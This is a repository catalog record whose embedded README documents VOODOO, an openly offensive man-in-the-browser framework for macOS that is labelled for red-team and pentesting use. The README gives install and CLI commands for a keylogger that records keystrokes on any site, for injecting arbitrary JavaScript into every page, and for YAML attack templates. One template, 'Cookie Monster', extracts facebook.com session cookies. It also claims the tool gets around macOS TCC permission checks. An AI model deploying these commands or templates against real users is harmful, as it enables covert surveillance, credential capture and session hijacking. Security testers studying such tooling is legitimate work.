{"id":13739740,"url":"https://github.com/breakpointHQ/VOODOO","last_synced_at":"2025-05-08T19:34:43.258Z","repository":{"id":43149711,"uuid":"467227970","full_name":"breakpointHQ/VOODOO","owner":"breakpointHQ","description":"Man in the Browser Framework","archived":false,"fork":false,"pushed_at":"2024-12-24T22:09:06.000Z","size":123,"stargazers_count":46,"open_issues_count":0,"forks_count":9,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-10T14:35:39.671Z","etag":null,"topics":["brave-browser","chrome","edge-browser","infosec","macos","main-in-the-browser","opera-browser","pentesting","redteam"],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/breakpointHQ.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-07T19:16:10.000Z","updated_at":"2025-04-07T07:10:53.000Z","dependencies_parsed_at":"2025-04-10T14:12:28.910Z","dependency_job_id":"8108b72f-ab69-4820-8c2e-5245a6e7e742","html_url":"https://github.com/breakpointHQ/VOODOO","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/breakpointHQ","download_url":"https://codeload.github.com/breakpointHQ/VOODOO/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253135537,"owners_count":21859663,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brave-browser","chrome","edge-browser","infosec","macos","main-in-the-browser","opera-browser","pentesting","redteam"],"created_at":"2024-08-03T04:00:37.041Z","updated_at":"2025-05-08T19:34:43.229Z","avatar_url":"https://github.com/breakpointHQ.png","language":"Ruby","funding_links":[],"categories":["[↑](#table-of-contents) Tooling","Tools"],"sub_categories":["Offensive Tools"],"readme":"# VOODOO\nVOODOO is a Man in the browser attack framework for macOS.\nIt comes with built-in keylogging, and scripting capabilities.\nVOODOO is highly extendable \u0026 shareable, it can execute `YAML` templates that define complex attacks.\n\n\u003cp align=\"center\"\u003e\n    \u003cbr /\u003e\n    \u003cimg src=\"./.github/voodoo.svg\" width=\"50%\" /\u003e\n\u003c/p\u003e\n\n## Browser Support\n\n| [\u003cimg src=\"https://raw.githubusercontent.com/alrra/browser-logos/master/src/edge/edge_48x48.png\" alt=\"IE / Edge\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eEdge | [\u003cimg src=\"https://raw.githubusercontent.com/alrra/browser-logos/master/src/chrome/chrome_48x48.png\" alt=\"Chrome\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eChrome | [\u003cimg src=\"https://raw.githubusercontent.com/alrra/browser-logos/master/src/opera/opera_48x48.png\" alt=\"Opera\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eOpera | [\u003cimg src=\"https://github.com/alrra/browser-logos/raw/main/src/brave/brave_48x48.png\" alt=\"Brave\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eBrave | [\u003cimg src=\"https://github.com/alrra/browser-logos/raw/main/src/chromium/chromium_48x48.png\" alt=\"Chromium\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eChromium |\n| --------- | --------- | --------- | --------- | --------- |\n| macOS only | macOS only | macOS only | macOS only | macOS only\n\n## Demo\n[![VOODOO](https://img.youtube.com/vi/4wTpdh06H_o/1.jpg?s)](https://www.youtube.com/watch?v=4wTpdh06H_o)\n\n## Why?\nIn macOS keylogging, webcam and microphone access usually require TCC permissions, VOODOO bypass all of this using chromium based browsers extensions.\n**VOODOO does not require root privileges or any TCC permissions to work.**\n\n## Legal Disclaimer\nUsage of this code for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.\n\n## Features\n* 📜 Content Scripts - inject arbitrary JavaScript to any page\n* 🔑 Keylogger - records user keystrokes on any site\n* 📋 VOODOO Templates - run advance man in the browser attacks from template files\n\n## Quick start\n```sh\n$: sudo gem install get-voodoo\n```\nOR\n\n```sh\n$: gem install get-voodoo --user-install\n```\n\nWhen installation without `sudo` make sure that `/Users/[user]/.gem/ruby/[version]/bin` is in your `PATH`.\n\n## Building\n```sh\n$: git clone https://github.com/breakpointHQ/VOODOO.git\n$: cd ./VOODOO\n$: gem build ./voodoo.gemspec\n$: gem install ./get-voodoo-X.X.X.gem\n```\n\n## CLI\n\n```sh\n$: voodoo\nCommands:\n  voodoo help [COMMAND]    # Describe available commands or one specific command\n  voodoo keylogger         # Records user keystrokes\n  voodoo script \u003cjs/path\u003e  # Add a content script\n  voodoo template \u003cpath\u003e   # Execute a VOODOO template\n  voodoo version           # Prints voodoo version\n```\n\n## Adding content script\n\n```sh\n$: voodoo help script\nUsage:\n  voodoo script \u003cjs/path\u003e\n\nOptions:\n  x, [--urls=one two three]         \n  f, [--format=FORMAT]              # pretty, json, payload, none\n                                    # Default: pretty\n  o, [--output=OUTPUT]              # File path\n  p, [--params=key:value]           \n  m, [--matches=one two three]      \n                                    # Default: [\"*://*/*\"]\n  b, [--browser=BROWSER]            \n                                    # Default: chrome\n  p, [--permissions=one two three]  \n      [--max-events=N]              \n\nAdd a content script\n```\n\nExecute JS on every page loaded on the Opera browser.\n```sh\n$: voodoo script \"alert('Hello VOODOO!');\" -b opera\n```\n\nExecute JS on every page matches `https://example.com/*`\n```sh\n$: voodoo script \"alert('Example VOODOO!');\" -b chrome -m \"https://example.com/*\"\n```\n\nExecute JS on every page loaded on Google Chrome, and open `https://example.com`.\n```js\n$: voodoo script /tmp/myjs.js -b chrome -x \"https://example.com\"\n```\n\n## Intercept browser traffic\n\nThis is no longer supported due to migration to the v3 chrome extension manifest.\n\n## Keylogger\n```sh\n$: voodoo help keylogger\nUsage:\n  voodoo keylogger\n\nOptions:\n  x, [--urls=one two three]     \n  f, [--format=FORMAT]          # pretty, json, payload\n                                # Default: pretty\n  o, [--output=OUTPUT]          # File path\n  m, [--matches=one two three]  \n                                # Default: [\"*://*/*\"]\n  b, [--browser=BROWSER]        \n                                # Default: chrome\n      [--max-events=N]          \n\nRecords user keystrokes\n```\n\nRecord user keys only when the url matches `https://example.com/*`\n```sh\n$: voodoo keylogger -m \"https://example.com/*\"\n```\n\n## Templates\n\nA VOODOO template is a `YAML` file that is used to define a man in the browser attack.\n\n```sh\n$: voodoo help template\nUsage:\n  voodoo template \u003cpath\u003e\n\nOptions:\n  b, [--browser=BROWSER]     \n  f, [--format=FORMAT]       # json, payload, none\n                             # Default: none\n  o, [--output=OUTPUT]       # File path\n  x, [--urls=one two three]  \n  p, [--params=key:value]    \n      [--max-events=N]       \n\nExecute a VOODOO template\n```\n\nA template must have have 3 main blocks: `info`, `scripts`, and `browser` and 2 optional settings `format` and `permissions`.\n\n### Information\n\nThe `info` block holds important information about your template. Info block provides `name`, `author`, and `description`.\n`info` block also supports dynamic fields, so you can define any key: value blocks to provide more useful information about the template.\n\nInfo block example:\n```yaml\ninfo:\n  name: Change the Title of example.com\n  author: Mr. Test\n  description: Overwrite the contents of the h1 tag in example.com every time the user visits it.\n```\n\n### Scripts\nThe `scripts` block define the content scripts and background scripts that will be injected to the browser.\nYou can spesify the following attributes for each script:\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n`matches` | array of strings | Specifies which pages this content script will be injected into. | `*://*/*` |\n`content` | string | Specifies the JavaScript code that will be executed | `nil` |\n`file` | string | Specifies the path to a JavaScript file that will be executed | `nil` |\n`background` | boolean | Specifies whether or not this is a background script | `false` |\n`communication` | boolean | Specifies whether a `collector` server should be spawned for this script. | `true` |\n\n### Scripts block examples:\n\nInject a content script from a file to every page\n```yaml\nscripts:\n  - matches: \"*://*/*\" # Inject to every page\n    file: ./keylogger.js # A JS file from the same folder as the template file\n```\n\nOverwrite the title of example.com and example.net\n```yaml\nscripts:\n  - matches:\n      - https://example.com/*\n      - https://example.net/*\n    content: document.querySelector('h1').innerText = 'VOODOO Example!';\n```\n\nInject a background script that will report back on every tab update.\n```yaml\nscripts:\n  - content: chrome.tabs.onUpdated.addListener((_,tab) =\u003e VOODOO.send(tab));\n    background: true\n```\n\nA template file looks like this:\n\n```yaml\ninfo:\n  name: Change the Title of example.com\n  author: Mr. Test\n  description: Overwrite the contents of the h1 tag in example.com every time the user visits it.\n\nscripts:\n  - matches: https://example.com/*\n    content: document.querySelector('h1').innerText = \"VOODOO Example\";\n\nbrowser:\n  default: opera\n  urls:\n    - https://example.net/\n    - https://example.com/\n```\n\n### JavaScript API\nWhen `communication` is `true`, content and background scripts can access the `VOODOO` object which expose the following APIs.\n\n### VOODOO.send(:data)\nWrite data to the selected output format.\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| data       | `any`   | the data you like to write to the selected output format. | `nil`\n\n### VOODOO.log(:str)\nWrite information to stdout.\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| str       | `string`   | the message you like to write to the VOODOO cli stdout | `nil`\n\n### VOODOO.kill(:options)\nStop the collector thread.\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| options   | `object`  | addional configuration | `{}`\n| options.close_browser | `boolean`  | when set to `true` the browser process will be killed | `false`\n\n### Dynamic Parameters\nYou can pass custom parameters to your template using the `--params` option, it accepts key value pairs in the following format `name:john age:42`.\nThose values could later be used in your script like that: `%{name}` `%{age}`.\n\nYou can see an example template that uses parameters at `templates/cookie-monster.yaml`.\n\n### Permissions\nThe `permissions` property is used to declare the necessary permissions for your VOODOO script.\nBy default VOODOO sets the following permissions:\n`tabs`, `*://*/*`, `webRequest`\n\nHere is an example of a template that uses the `cookies` permission to extract `facebook.com` cookies.\n```yaml\ninfo:\n  name: Cookie Monster\n\nformat: payload\n\npermissions:\n  - cookies\n\nscripts:\n  - content: |\n      chrome.cookies.getAll({domain: \"facebook.com\"}, cookies =\u003e {\n        VOODOO.send(cookies)\n        VOODOO.kill();\n      });\n    background: true\n```\n\n### Browser\nThe `browser` block is a key value object that defines browser related settings for the template.\nPlease note, the `name` setting can be overwrited using the `--browser` or `-b` CLI option.\nThe `urls` setting can also be overwrited using the `--urls` or `-x` CLI options.\n\n| Name      | Type      | Description | Default | \n| --------- | --------- | --------- | --------- |\n| default   | string    | supported browser short name `chrome`, `opera`, `edge`, `brave`, `chromium` | `chrome`\n| urls      | array of strings | list of urls to open right after we hijack the browser. | `NULL`\n\n### Format\nThe `format` property sets the default output format for the template.\nPlease note, this setting can be overwrited using the `--format` or `-f` CLI option.\n\n```yaml\ninfo:\n  name: Title Spy\n  description: Extract the title from any https site the user visits\n\nformat: payload\n\nscripts:\n  - matches: https://*/*\n    content: 'VOODOO.send({title: document.title})'\n\nbrowser:\n  default: opera\n```\n\n## Ruby API\n\nThe underline Ruby API can also be used for advance integrations.\n\n```rb\nrequire 'voodoo'\n\nbrowser = VOODOO::Browser.Chrome\n                       # .Opera\n                       # .Edge\n                       # .Chromium\n\n# Execute JS on example.com\nbrowser.add_script(content: 'alert(\"VOODOO Example!\");',\n                   matches: 'https://example.com/*')\n\n# Inject a keylogger to every page\nbrowser.keylogger do |event|\n    print event[:payload][:log]\nend\n\n# hijack the browser, and open example.com\nbrowser.hijack 'https://example.com'\n```\n\n## Development\n\nRunning project tests\n```sh\n$: bundle exec rake test\n```\n\n## Contributing\n* File an issue first prior to submitting a PR!\n* If applicable, submit a test suite against your PR\n\n## TO DO\n* Windows/Linux support\n* Ruby API documentation\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FbreakpointHQ%2FVOODOO","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FbreakpointHQ%2FVOODOO","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FbreakpointHQ%2FVOODOO/lists"}